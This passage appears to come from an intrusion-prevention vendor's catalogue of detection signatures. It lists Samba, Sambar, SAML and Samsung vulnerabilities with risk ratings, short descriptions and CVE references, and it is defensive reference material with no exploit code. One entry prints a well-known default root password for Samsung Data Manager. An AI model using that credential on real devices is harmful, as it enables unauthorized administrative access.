SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1

References:

CVE-2002-1318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1318

BID-6210
http://www.securityfocus.com/bid/6210

OSVDB-14525
http://www.osvdb.org/14525

Samba-Printer-Server-Spoolss-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

Improper validation of MSRPC messages causes a denial of service vulnerability in Samba.

Situation:

MSRPC-TCP_CPS-Samba-Printer-Server-Spoolss-Denial-Of-Service

References:

CVE-2018-1050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1050

BID-103387
http://www.securityfocus.com/bid/103387

Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Infinite Loop

Description:

A memory exhaustion vulnerability has been reported in Samba server. The vulnerability is due to an infinite loop allocating memory that occurs when processing specially crafted packets. A remote authenticated or guest attacker could exploit this vulnerability by sending specially crafted requests to the target server. Successful exploitation of this vulnerability results in a denial of service condition.

Situation:

SMB-TCP_Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service

References:

CVE-2013-4124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4124

OSVDB-95969
http://www.osvdb.org/95969

Samba-receive_smb_raw-SMB-Packets-Parsing-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Samba. A successful exploit leads to a denial of service terminating the vulnerable application or non-privileged arbitrary code execution.

Situation:

NetBIOS-TCP_Samba-receive-smb-raw-SMB-Packets-Parsing-Buffer-Overflow

References:

CVE-2008-1105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1105

BID-29404
http://www.securityfocus.com/bid/29404

OSVDB-45657
http://www.osvdb.org/45657

Samba-Remote-Code-Execution-From-Writable-Share

About this vulnerability:

A Samba Remote Code Execution From Writable Share vulnerability

Risk:

High

First detected in:

sgpkg-ips-914-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Insecure Configuration

Description:

A remote code execution vulnerability in Samba, versions 3.5.0 and onwards, which allows remote attackers to upload a shared library to a writable share, and to load and execute it.

Situation:

SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share
SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share-2

References:

CVE-2017-7494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494

Samba-Root-File-System-Access-Security-Bypass

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-358-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

A security bypass vulnerability exists in Samba. The vulnerability is due to a design weakness when registry based share definition is enabled. A remote attacker may leverage this vulnerability to gain read-only access to the local file system in the security context of the Samba service. In the case of a successful attack, a remote attacker may gain read-only access the root directory on the target system in the security context of the Samba service.

Situation:

SMB-TCP_Samba-Root-File-System-Access-Security-Bypass

References:

CVE-2009-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022

BID-33118
http://www.securityfocus.com/bid/33118

OSVDB-51152
http://www.osvdb.org/51152

Samba-Security-Descriptor-Parsing-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in Samba security descriptor parsing

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Samba

Type:

Buffer Overflow

Description:

Samba is vulnerable to an integer overflow when processing MS-RPC requests. A remote authenticated attacker could send a specially-crafted message requesting multiple security descriptors, which would lead to heap corruption and execution of arbitrary commands on the system with root privileges or possibly cause a Denial of Service (DoS).

Situation:

SMB-TCP_Samba-Security-Descriptor-Parsing-Integer-Overflow

References:

CVE-2004-1154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1154

BID-11973
http://www.securityfocus.com/bid/11973

OSVDB-12422
http://www.osvdb.org/12422

Samba-Sid-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Critical

First detected in:

sgpkg-ips-359-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Samba. The vulnerability is due to a boundary error when parsing the Security ID (SID) in SMB packets. Remote attackers could exploit this vulnerability by sending a crafted SMB message to a target SMB server. Successful exploitation would allow for arbitrary code injection and execution which might allow the attacker to take complete control of a target host. Code injection that does not result in execution could crash the vulnerable service, and result in a Denial of Service condition.

Situation:

SMB-TCP_Samba-Sid-Parsing-Stack-Buffer-Overflow

References:

CVE-2010-3069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3069

BID-43212
http://www.securityfocus.com/bid/43212

Samba-SMB-CIFS-Packet-Assembling-BOF

About this vulnerability:

Remote buffer overflow in Samba

Risk:

High

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Samba

Type:

Buffer Overflow

Description:

SMB daemon (smbd) in Samba before 2.2.8 is vulnerable to a buffer overflow in the SMB/CIFS packet fragment reassembly code. A remote attacker could send a specially-crafted SMB/CIFS packet to overwrite memory and possibly execute arbitrary code on the system with the root privileges.

Situation:

SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1

References:

CVE-2003-0085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0085

BID-7106
http://www.securityfocus.com/bid/7106

OSVDB-6323
http://www.osvdb.org/6323

Samba-SMB1-Information-Disclosure

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-994-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Input Validation

Description:

Improper validation of write requests causes an information disclosure vulnerability in Samba. A successful exploit allows a remote attacker to leak the memory contents of the target system without authentication.

Situation:

SMB-TCP_CHS-Samba-SMB1-Information-Disclosure

References:

CVE-2017-12163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12163

Samba-SMB1-Message_Push_String-Information-Disclosure

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

Improper handling of SMB1 commands causes uninitialized memory contents to be included in the response message. A successful exploit may allow an attacker to gain access to privileged information on the target.

Situation:

SMB-TCP_SHS-Samba-SMB1-Message_Push_String-Information-Disclosure

References:

CVE-2017-15275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15275

Samba-SMB1-Packets-Chaining-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Samba

Risk:

Critical

First detected in:

sgpkg-ips-317-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Samba

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Samba. A remote unauthenticated attacker can exploit this vulnerability by specifying a malicious AndXOffset in the AndX request to compromise the vulnerable system.

Situation:

NetBIOS-TCP_Samba-SMB1-Packets-Chaining-Memory-Corruption
SMB-TCP_CHS-Samba-SMB1-Packets-Chaining-Memory-Corruption

References:

CVE-2010-2063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2063

BID-40884
http://www.securityfocus.com/bid/40884

OSVDB-65518
http://www.osvdb.org/65518

Samba-SMB1-Smb_request_done-Use-After-Free

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1022-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

A use after free vulnerability in SMB1 component of Samba could allow a remote, authenticated attacker to run arbitrary code execution in the security context of the Samba service.

Situation:

SMB-TCP_CS-Samba-SMB1-Smb_request_done-Use-After-Free

References:

CVE-2017-14746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14746

Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-818-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Samba. A remote, authenticated attacker could use this to gain sensitive information.

Situation:

SMB-TCP_Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure

References:

CVE-2015-5252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5252

Samba-smbd-Flags2-Header-Parsing-DOS

About this vulnerability:

A null pointer dereference vulnerability in Samba

Risk:

Critical

First detected in:

sgpkg-ips-308-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Malfunction

Description:

There is a null pointer dereference vulnerability in Samba. An unauthenticated remote attacker can exploit this vulnerability by creating a mismatch by changing the FLAGS2 field between the Session Setup AndX request and associated Negotiate Protocol request to cause a process panic, leading to a denial of service condition.

Situation:

SMB-TCP_CHS-Samba-smbd-Flags2-Header-Parsing-DOS

References:

BID-40097
http://www.securityfocus.com/bid/40097

Samba-smbd-Packets-Chaining-AndX-Offset-Infinite-Loop

About this vulnerability:

A vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Infinite Loop

Description:

There is an infinite loop vulnerability in Samba. The vulnerability is due to insufficient validation of AndX request offsets, which should be increasing in a strictly monotonic manner. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious AndX request to the target. Successful exploitation of this vulnerability could result in the execution of arbitrary code in the context of the affected service.

Situation:

SMB-TCP_Samba-smdb-Packets-Chaining-AndX-Offset-Infinite-Loop

References:

CVE-2012-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870

BID-52103
http://www.securityfocus.com/bid/52103

OSVDB-79443
http://www.osvdb.org/79443

Samba-smbd-Serverpasswordset-RPC-Memory-Corruption

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the Samba smbd daemon. The vulnerability is due to the way _netr_ServerPasswordSet() in Samba handles ServerPasswordSet RPC requests. As it processes crafted NetLogon packets, it attempts to free an uninitialized pointer using TALLOC_FREE(). A remote, unauthenticated attacker could exploit this vulnerability by sending malicious NetLogon RPC messages to the target server. Successful exploitation could lead to arbitrary code execution with the root privileges.

Situation:

MSRPC-TCP_CPS-Samba-smbd-Serverpasswordset-RPC-Memory-Corruption

References:

CVE-2015-0240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240

BID-72711
http://www.securityfocus.com/bid/72711

OSVDB-118637
http://www.osvdb.org/118637

Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS

About this vulnerability:

A denial of service vulnerability in Samba

Risk:

Critical

First detected in:

sgpkg-ips-308-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Malfunction

Description:

There is a denial of service vulnerability in Samba. An unauthenticated remote attacker can send an SMB Session Setup AndX request with an overly large SecurityBlobLength to cause a process panic, leading to a denial of service condition.

Situation:

SMB-TCP_CHS-Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS

References:

BID-40097
http://www.securityfocus.com/bid/40097

Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Critical

First detected in:

sgpkg-ips-361-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the SPOOLSS RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.

Situation:

MSRPC-TCP_CPS-Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-BOF

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-24197
http://www.securityfocus.com/bid/24197

Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-1638-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

Samba

Type:

Infinite Loop

Description:

An infinite loop vulnerability has been reported for Samba. This vulnerability is due to improper validation RPC data in the mdssvc service. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted mdssvc RPC request to the target server. Successfully exploiting this vulnerability could result in denial of service conditions.

Situation:

SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service

References:

CVE-2023-34966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34966

Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Generic

Software:

Samba

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in samba. This vulnerability is due to improper validation of value types before use, causing type confusion. A remote unauthenticated attacker could exploit these vulnerabilities by sending maliciously crafted data to the target server. Successful exploitation of this vulnerability could lead to denial of service.

Situation:

SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service

References:

CVE-2023-34967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34967

Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote unauthenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the SRVSVC RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the Samba user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will terminate.

Situation:

MSRPC-TCP_Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

Samba-Swat-HTTP-Authentication-Buffer-Overflow

About this vulnerability:

A Samba Swat HTTP Authentication Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the Samba SWAT web based administration tool which allows remote attackers to create a denial of service condition or execute arbitrary code by sending a specially crafted authentication string.

Situation:

HTTP_CSH-Samba-Swat-HTTP-Authentication-Buffer-Overflow

References:

CVE-2004-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0600

Samba-Trans2open-BOF

About this vulnerability:

Samba trans2open function buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the samba server. This vulnerability can be remotely exploited, and if exploited successfully, it grants the attacker a remote root access.

Situation:

SMB-TCP_CHS-Samba-Trans2open-BOF-1

References:

CVE-2003-0201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0201

BID-7294
http://www.securityfocus.com/bid/7294

Samba-Unauthorized-Read-Access-Via-Authentication-Bypass

About this vulnerability:

Authentication bypass vulnerability allows remote read access

Risk:

High

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Samba

Type:

Malfunction

Description:

Situation:

SMB-TCP_Samba-Authentication-Bypass

References:

CVE-2009-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022

BID-33118
http://www.securityfocus.com/bid/33118

OSVDB-51152
http://www.osvdb.org/51152

Samba-Unicode-Filename-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A vulnerability has been reported in the way Samba handles file information requests. A malformed request can trick the server into overflowing an incorrectly allocated buffer while generating a response. If certain conditions are met, an attacker can exploit this vulnerability to execute malicious code on the vulnerable server with the privileges of the the session user account. In a simple attack exploiting this vulnerability, the target Samba server will terminate the child process serving the attacker, closing the connection as a result. The parent Samba process spawns multiple child processes to serve requests. Each child process serves one client. Therefore, a simple attack will only affect the process dedicated to serving the attacker. In the case of a more sophisticated attack, arbitrary code is executed with the privileges of the child process. The behaviour of the target system will be dependent on the malicious code.

Situation:

SMB-TCP_Samba-Unicode-Filename-Buffer-Overflow

References:

CVE-2004-0882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0882

BID-11678
http://www.securityfocus.com/bid/11678

OSVDB-11782
http://www.osvdb.org/11782

Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

Samba

Type:

Input Validation

Description:

Improper parsing of the EA metadata by the vfs_fruit module causes a out of bounds read and write vulnerability while opening files in smbd. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

SMB-TCP_CHS-Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write

References:

CVE-2021-44142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44142

Samba-Wild-Card-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Samba

Risk:

Low

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Samba

Type:

Malfunction

Description:

Samba SMB/CIFS server is vulnerable to a denial-of-service (DoS) attack, caused by a vulnerability in the ms_fnmatch function. By sending multiple specially-crafted commands to the vulnerable server, a remotely-authenticated attacker could consume 100% of the available CPU resources.

Situation:

SMB-TCP_CHS-Samba-Wild-Card-DoS

References:

CVE-2004-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0930

BID-11624
http://www.securityfocus.com/bid/11624

OSVDB-11555
http://www.osvdb.org/11555

Sambar-Cgitest

About this vulnerability:

Sambar Server cgitest.exe input size validation failure

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Sambar Server

Type:

Buffer Overflow

Description:

Sambar Server contains the cgitest.exe sample program that validates the input length incorrectly. This may lead to a buffer overflow that could cause a system compromise.

References:

CVE-2002-0128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0128

BID-3885
http://www.securityfocus.com/bid/3885

Sambar-Server-Search-Results-Buffer-Overflow

About this vulnerability:

A Sambar Server Search Results Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sambar Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Sambar Server, versions before 6.0, which allows remote attackers to execute arbitrary code via an HTTP POST request with a long query parameter.

Situation:

HTTP_CRL-Sambar-Server-Search-Results-Buffer-Overflow

References:

CVE-2004-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2086

BID-9607
http://www.securityfocus.com/bid/9607

OSVDB-5786
http://www.osvdb.org/5786

Sambar-Server-Search-Script-BOF

About this vulnerability:

Buffer overflow in Sambar Server search script

Risk:

Moderate

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sambar Server

Type:

Buffer Overflow

Description:

Sambar Server is vulnerable to a denial of service attack, because of a buffer overflow in its search script. By sending a specially-crafted query in post mode to the vulnerable server, a remote attacker could overflow a buffer and cause the server to crash or execute arbitrary code on the server.

Situation:

HTTP_CS-Sambar-Server-Search-Script-DoS

References:

BID-7975
http://www.securityfocus.com/bid/7975

OSVDB-2204
http://www.osvdb.org/2204

Saml-XML-Signature-Wrapping

About this vulnerability:	An attempt to exploit a vulnerability in SAML authentication detected
Risk:	High
First detected in:	sgpkg-ips-1770-5242
Last changed:	sgpkg-ips-1770-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	Security Assertion Markup Language (SAML) with XML signatures is a critical component of federated identity deployments and single sign-on. This fingerprint detects main variants of the XML signature wrapping vulnerabilities, which could be exploited to bypass authentication or escalate privileges.
Situation:	HTTP_CRL-Saml-XML-Signature-Wrapping

Samsung-Data-Manager-Default-Root-Password

About this vulnerability:	A vulnerability in Samsung Data Manager
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Samsung Data Manager
Type:	Malfunction
Description:	Samsung Data manager uses a well-known default password (rkwjsdusrnth) for root account which allows remote attackers to gain administrative privileges in Samsung Data Manager web service.
Situation:	FTP_CS-Samsung-Data-Manager-Default-Root-Password Telnet_CS-Samsung-Data-Manager-Default-Root-Password

Samsung-Data-Manager-Hardcoded-Credentials

About this vulnerability:	A vulnerability in Samsung Data Manager
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Samsung Data Manager
Type:	Malfunction
Description:	Samsung Data Manager uses hardcoded credentials which allows remote attackers to gain administrative privileges in Samsung Data Manager web service.
Situation:	HTTP_CRL-Samsung-Data-Manager-Hardcoded-Credentials

Samsung-Data-Manager-SQL-Injection

About this vulnerability:

A vulnerability in Samsung Data Manager

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung Data Manager

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in the authentication form of Samsung Data Manager which allos remote attacker to execute arbitrary SQL commands.

Situation:

HTTP_CRL-Samsung-Data-Manager-SQL-Injection

References:

CVE-2010-4284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4284

Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow

About this vulnerability:

A vulnerability in Samsung iPOLiS Device Manager

Risk:

Moderate

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung iPOLiS Device Manager

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Samsung iPOLiS Device Manager. The vulnerability is due to insufficient input validation in the implementation of the FindConfigChildeKeyList method of the XNSSDKDEVICE.XnsSdkDeviceCtrlForIpInstaller ActiveX control. A remote attacker can exploit these vulnerabilities by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.

Situation:

File-Text_Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow

References:

CVE-2014-3912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3912

BID-67823
http://www.securityfocus.com/bid/67823

OSVDB-107722
http://www.osvdb.org/107722

Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Samsung iPOLiS Device Manager

Risk:

Moderate

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung iPOLiS Device Manager

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Samsung iPOLiS Device Manager. The vulnerability is due to insufficient input validation of a parameter passed to WriteConfigValue() of the XnsSdkDeviceIpInstaller ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.

Situation:

File-Text_Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow

References:

CVE-2015-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555

OSVDB-118668
http://www.osvdb.org/118668

Samsung-Kies-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in Samsung Kies

Risk:

Moderate

First detected in:

sgpkg-ips-488-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung Kies

Type:

Malfunction

Description:

There is an arbitrary command execution vulnerability in Samsung Kies. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a malicious web site. This can result in arbitrary command execution in the context of the affected user.

Situation:

File-Text_Samsung-Kies-Arbitrary-Command-Execution

References:

CVE-2012-3807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3807

OSVDB-86501
http://www.osvdb.org/86501

Samsung-Net-I-Viewer-Buffer-Overflow

About this vulnerability:

A Samsung Net-I Viewer Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung NET-i Viewer

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Samsung NET-i Viewer, versions before 1.37, in the BackupToAvi method, which allows remote attackers to execute remote code via a long string.

Situation:

File-Text_Samsung-Net-I-Viewer-Buffer-Overflow

References:

CVE-2012-4333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4333

BID-53193
http://www.securityfocus.com/bid/53193

OSVDB-81453
http://www.osvdb.org/81453

Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in Samsung Security Manager

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Samsung Security Manager

Type:

Malfunction

Description:

Multiple policy bypass vulnerabilities have been reported in Samsung Security Manager. The vulnerabilities are due to the permitting of unauthenticated PUT, MOVE and DELETE requests on the server. A remote unauthenticated attacker could exploit this vulnerability by sending a PUT, MOVE or DELETE request to the server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM user or a denial of service condition.

Situation:

HTTP_Request-DELETE
HTTP_Request-WebDAV-MOVE
HTTP_Request-PUT
HTTP_CRL-Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities

References:

CVE-2015-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1499

OSVDB-121464
http://www.osvdb.org/121464

Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Samsung SmartViewer

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung SmartViewer

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Samsung SmartViewer. The vulnerability is due to improper validation of a parameter provided to the BackupToAvi method of the CNC_Ctrl ActiveX Control. A remote, unauthenticated attacker can exploit this vulnerability by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.

Situation:

File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities

References:

CVE-2014-9265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

BID-71486
http://www.securityfocus.com/bid/71486

OSVDB-115479
http://www.osvdb.org/115479

Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Out-Of-Bounds-Indexing

About this vulnerability:

A vulnerability in Samsung SmartViewer

Risk:

Moderate

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung SmartViewer

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code on the target system in the context of the current user.

Situation:

File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities

References:

CVE-2015-8040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8040

Samsung-Smartviewer-Stwaxconfig-Memory-Corruption

About this vulnerability:

A vulnerability in Samsung SmartViewer

Risk:

Moderate

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung SmartViewer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code in the security context of the process.

Situation:

File-Text_Samsung-Smartviewer-Stwaxconfig-Memory-Corruption

